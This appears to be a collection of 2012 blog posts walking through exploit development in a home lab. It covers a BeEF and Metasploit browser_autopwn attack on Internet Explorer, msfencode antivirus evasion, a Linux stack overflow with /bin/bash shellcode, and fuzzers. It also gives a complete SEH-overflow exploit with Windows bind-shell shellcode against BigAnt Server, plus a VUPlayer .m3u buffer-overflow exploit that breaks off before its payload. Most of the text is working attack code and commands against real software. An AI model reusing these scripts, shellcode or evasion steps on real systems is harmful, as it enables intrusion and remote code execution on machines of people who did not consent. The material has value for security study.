
Wednesday, 29 February 2012

Exploiting Internet Explorer with BeEF and Metasploit

BeEF is the Browser Exploitation Framework.

1. Start BeEF-ng from the console: Menu --> Apps --> Exploitation Tools --> Social Engineering Tools -->
BeEF XSS Framework --> BeEF ng

It shows the following in the terminal:

2. Open a browser, go to http://127.0.1.1:3000/ui/panel, and log in with username: beef, password: beef.


Then, in Internet Explorer on the Windows VirtualBox guest, browse to http://192.168.56.1/beef/panel.ui.



The BeEF control panel will automatically detect the target's IP address (192.168.56.101), and the interface should look like this:

Now we need to make the payload. We will use "browser_autopwn": open the console, start msfconsole, and follow the steps shown in the picture below.

Now our payload is ready and we have the URL http://0.0.0.0:8080/. We need to replace 0.0.0.0 with our own IP address, then load the URL into the BeEF control panel under Browser -> Site Redirect and execute it.

After that, from Internet Explorer on Windows, browse to http://192.168.56.1:8080/.


Our payload executes automatically, and the exploit succeeds.

Monday, 27 February 2012

About Social Engineering and SET

Social Engineering
     Social engineering is the name of a technique of information gathering that exploits the victim's psychology; it could perhaps also be regarded as fraud. Social engineering requires patience and caution towards the unsuspecting victim. We are required to be creative and able to think like the victim.
Social engineering is the art of getting others to do things according to your expectations or desires. Of course, this is not done openly or outside the behaviour that is normal for the victim.
      Social engineering concentrates on the weakest link in computer network systems, namely humans. As we know, there is no computer system that does not involve human interaction, and worse, this vulnerability is universal, independent of platform, operating system, protocol, software or hardware. That is, every system has the same weakness in the human factor. Any person who has physical access to the system is a threat, even if that person is not covered by the security policy that has been developed. Like other methods such as hacking, social engineering also requires preparation; in fact most of the work is the preparation itself.

SET
      SET is a Python-driven suite of custom tools which focuses solely on attacking the human element of penetration testing. Its main purpose is to augment and simulate social engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
 

Example Using an Auxiliary Module

Port Scanning
Metasploit has several port scanners built into its auxiliary modules that integrate directly with most aspects of the Framework. Let's conduct a simple scan of a single host using Metasploit's SYN port scanner.

msf > use auxiliary/scanner/portscan/syn
msf  auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf  auxiliary(syn) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf  auxiliary(syn) > set THREADS 50
THREADS => 50
msf  auxiliary(syn) > run

[-] Auxiliary failed: RuntimeError eth0: no IPv4 address assigned
[-] Call stack:
[-]   /opt/framework/msf3/lib/msf/core/exploit/capture.rb:108:in `setfilter'
[-]   /opt/framework/msf3/lib/msf/core/exploit/capture.rb:108:in `open_pcap'
[-]   /opt/framework/msf3/modules/auxiliary/scanner/portscan/syn.rb:51:in `run_batch'
[-]   /opt/framework/msf3/lib/msf/core/auxiliary/scanner.rb:162:in `block in run'
[-]   /opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `call'
[-]   /opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `block in spawn'
[*] Auxiliary module execution completed

About msfpayload and msfencode

1. msfpayload
      msfpayload is the component of Metasploit that allows us to generate shellcode, executables and much more for use in exploits outside of the framework.
      Shellcode can be generated in many formats, including JavaScript, Ruby, C and even Visual Basic for Applications. Each output format is useful in different situations.
     For example, if we are working with a Python-based proof of concept, C-style output might be best; if we are working on a browser exploit, JavaScript output might be best. Once we have the desired output, we can easily insert the payload directly into an HTML file to trigger the exploit.

root@bt:/pentest/exploits/framework# msfpayload windows/meterpreter/bind_tcp

2. msfencode
         msfencode is the Metasploit component that helps us avoid bad characters and evade antivirus and IDS by encoding the original payload in a way that does not include the bad characters.
         When in doubt, though, we really can't go wrong with the x86/shikata_ga_nai encoder, the only encoder with the rank of Excellent, a measure of the reliability and stability of a module. To see the list of available encoders, append -l to msfencode as shown next. The encoders are ranked in order of reliability.

root@bt:/pentest/exploits/framework# msfencode -l

Friday, 24 February 2012

Exploiting Linux

1. Turn off Linux ASLR


2. Make the vulnerable application

// the deliberately vulnerable program: strcpy() copies argv[1] into a
// 500-byte stack buffer with no length check
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);   /* unbounded copy: the overflow happens here */

    return 0;
}

3. Compile the vulnerable application

4. Now we can find the offset needed to trigger the crash and overwrite the return address

5. Check whether the buffer has already overwritten the EIP and ESP values

6. Find the EIP address



So we get the EIP address 0xbffff12c, but this is not the real ESP address; we need to subtract 200 bytes, so my EIP address is 0xbfffef2c (calculated with KCalc).
Now we know we need 508 bytes, from this formula:
323 bytes of junk + a shellcode which is 45 bytes = 408 bytes.
508 bytes - 408 bytes = 100 bytes.
So after the shellcode we still have 100 bytes; we divide 100 by 4 (to fit an entire memory address,
\x41\x41\x41\x41 for example) and get 35.

7. Generate the shellcode with sc_generate, with a length of 45 bytes

$(python -c 'print "\x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')


Check the EIP address

Modified exploit

$(python -c 'print "\x90"*370 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')


Wednesday, 22 February 2012

Exploiting the File Sharing Wizard Application

This time I will try to exploit the File Sharing Wizard application. This application is used over a network connection, so I will find the vulnerable input with Wireshark.

Making the fuzzer
Based on the Wireshark analysis we will send 2000 bytes of data to the application. This fuzzer is written in Python.

Try 1:

#!/usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n'
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()

Running this fuzzer against the application, the application does not crash.

Try 2:

#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n'
header+='HOST : 239.255.255.250:190\r\n'
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()


I try modifying the fuzzer.

#!/usr/bin/python
import socket

buffer="\x41"*2000
head=('GET %s HTTP/1.1\r\n\r\n') % (buffer)

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.56.105',80))
sock.send(head)
sock.close()

Run the fuzzer in the console and see what happens... the application crashes.

Friday, 17 February 2012

Exploiting BigAnt Server

This local server application listens on port number 6660. We will try to attack it through the USV command.

Make the fuzzer

#!/usr/bin/python
import socket
buffer = "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

Run BigAnt Server, then attach it to OllyDbg. We will try to send a 2500-byte buffer to the server with the fuzzer and see what happens.


The application crashes, but EIP is not overwritten by the buffer we sent, because the SEH handler took over when the overflow happened. We can check this by clicking View --> SEH chain.



To pass the buffer on to the stack we press Shift+F9, which passes the exception through the SEH handler.



Get POP POP RETN
We need a POP POP RETN address to overwrite the SEH handler address in the application, so we use "View" then "Executable modules".



We can find POP POP RETN inside a module using OllyDbg: from OllyDbg click View, then Executable modules, and double-click the file vbajet32.dll. Once we are inside the CPU window for vbajet32.dll, right-click, choose Search for, then Sequence of commands, fill it with POP r32, POP r32, RETN and click Find. Then we get an address in the memory of vbajet32.dll.



Create pattern offset
To find how many bytes it takes to reach the SEH handler, we use pattern_create from Metasploit and load the generated characters into the buffer.

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt

#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

Restart OllyDbg and BigAnt Server, then run it again with the new fuzzer; to pass the exception press Shift+F9. To count the number of bytes in the buffer we use pattern_offset.



root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966

Now we know we need a buffer of about 966 bytes to reach the SEH handler, so we put that into the fuzzer.

#!/usr/bin/python
import socket

buffer ="USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

After that restart OllyDbg and BigAnt Server, then run it with the fuzzer. BigAnt Server crashes and the \x41 bytes overwrite the SEH handler.




Controlling the CPU process
After we have the byte offset that reaches the SEH handler, we load the address from vbajet32.dll containing POP POP RETN into the fuzzer.

#!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

Before we run BigAnt Server we need to set a breakpoint on the SEH memory address to make sure our exploit really points at the right target. Then run it with the fuzzer.

Press Shift+F9 to continue into the memory of vbajet32.dll and F7 to step to the RETN.

But now we have a problem: the memory space there is only about 4 bytes, which is not enough to hold shellcode, so we need to relocate to an address with more space. Right-click on 015FFD7C, then "Follow in dump", then "Selection".



Generating the shellcode
We will use

root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

then open it in the browser


I will use a Windows bind shell to generate the shellcode


Then we load the shellcode into the fuzzer without bad characters. We must check that the shellcode does not contain any bad characters, so we check it manually by sending the fuzzer row by row. After the shellcode is clear of bad characters, the final fuzzer looks like this:

#!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 32
buffer+= ("\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

Running the payload
To run the payload, open BigAnt Server and run it; after that we send the fuzzer and connect with telnet.


Tuesday, 14 February 2012

Exploiting VUPlayer


Buffer Overflow in VUPlayer
A. Trying
  1. I try to make a fuzzer for the .vpl file format
#!/usr/bin/python
filename="error.vpl"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. Run the Python file in the terminal to make the new file
  2. Run VUPlayer and load the fuzzer output in .vpl format; the application does not crash, and trying buffers up to 2000 VUPlayer does not crash either.
  3. I try to make a fuzzer for the .m3u file format

#!/usr/bin/python
filename="error.m3u"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. Run the fuzzer in the terminal to make a new .m3u file.
  2. Run VUPlayer and load the fuzzer output in .m3u format; again it does not crash. I try changing the buffer to 2000 and this shows: the application disappears from the window.
  3. I try again to make a fuzzer for the .pls file format.

#!/usr/bin/python
filename="error.pls"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()


  1. Run the fuzzer in the terminal to make the .pls file
  2. Run VUPlayer again and load the fuzzer output in .pls format; again it does not crash. I try changing the buffer to 2000 and this shows: the application disappears from the window.
  3. I try again to make a fuzzer for the .asx format

#!/usr/bin/python
filename="error.asx"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. Run the fuzzer in the terminal to make the .asx file
  2. Run VUPlayer again and load the fuzzer output in .asx format; again the application does not crash. I try changing the buffer up to 2000 but it still does not crash.
  3. I try again to make a fuzzer for the .wax format.

#!/usr/bin/python
filename="error.wax"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. Run the fuzzer in the terminal to make the .wax file
  2. Run VUPlayer again and load the fuzzer output in .pls format; again it does not crash. I try changing the buffer to 2000 and this shows: the application disappears from the window.
  3. Make a fuzzer in Python that produces the .cue file format.

#!/usr/bin/python
filename="error.cue"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. Run the fuzzer in the terminal to make the .cue file
  2. Run VUPlayer again and load the fuzzer output in .asx format; again the application does not crash. I try changing the buffer up to 2000 but it still does not crash.

From these results, the file formats that cause a buffer overflow are .m3u, .pls and .wax, but the format I chose is .m3u.

B. Showing the Debugging Process
  1. Run the VUPlayer application in OllyDbg to watch the process and analyse the memory.
  1. Make dummy data with pattern_create
    - open a terminal and type:
    root@bt:~# cd /pentest/exploits/framework/tools/
    root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt

       - type in the terminal: #kwrite error.txt
        In this case the function shows the dummy string structure.

       - copy and paste the value of error.txt and modify the fuzzer

#!/usr/bin/python
filename="error1.m3u"
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
#buffer+="\x41" * 2000
file=open(filename,'w')
file.write(buffer)
file.close()

    • run the fuzzer after modification in the terminal
    • run VUPlayer in OllyDbg, load the modified fuzzer output and pay attention to the ESP and EIP registers.

  1. Count the bytes from the pattern
    - type in the terminal:
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 68423768
    1012
        In this case, the EIP address that VUPlayer overwrites is at 1023, 1024, 1025 and 1016, because the EIP address is only 4 bytes.
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 8Bh9Bi
    1016

  1. Prove the EIP address
    - modify the fuzzer
    #!/usr/bin/python
    filename="error2.m3u"
    buffer="\x90" * 1012
    buffer+="\xEF\xBE\xAD\xDE"
    file=open(filename,'w')
    file.write(buffer)
    file.close()

    • run VUPlayer in OllyDbg and load the fuzzer output
  1. Prove the ESP address
    - modify the fuzzer
    #!/usr/bin/python
    filename="error3.m3u"
    buffer="\x90" * 1012
    buffer+="\xEF\xBE\xAD\xDE"
    buffer+="\x90" * (1016-len(buffer))
    buffer+="\xCC" * (2000-len(buffer))
    file=open(filename,'w')
    file.write(buffer)
    file.close()

    • run VUPlayer again in OllyDbg and load the fuzzer output
  1. JMP ESP
    1. search for JMP ESP
    - Run VUPlayer in OllyDbg, click the View menu and choose Executable modules. In the Executable modules window I double-clicked shell32.dll. A new shell32.dll window appears; right-click in the main window → Search for --> Command, type JMP ESP and press the Find button.

  1. Prove JMP ESP
    - modify the fuzzer

#!/usr/bin/python
filename="error4.m3u"
buffer="\x90" * 1012
buffer+="\xD7\x30\x9D\x7C"
buffer+="\xCC" * (1016-len(buffer))
buffer+="\xCC" * (2000-len(buffer))
file=open(filename,'w')
file.write(buffer)
file.close()

    • run the application in OllyDbg and load the modified fuzzer output

  1. Payload
    1. make the payload
    - run the Metasploit 2 GUI from the terminal; type:
    root@bt:~# cd /pentest/exploits/framework2/
    root@bt:/pentest/exploits/framework2# ./msfweb
    +----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

    • open a web browser and go to: localhost:55555
    • filter the modules by payload
    • choose the payload module
    • generate the payload

  1. Modify the fuzzer
    - copy and paste the payload generated by msfweb
    #!/usr/bin/python
    filename="error5.m3u"
    buffer="\x90" * 1012
    buffer+="\xD7\x30\x9D\x7C"
    buffer+="\x90" * 32
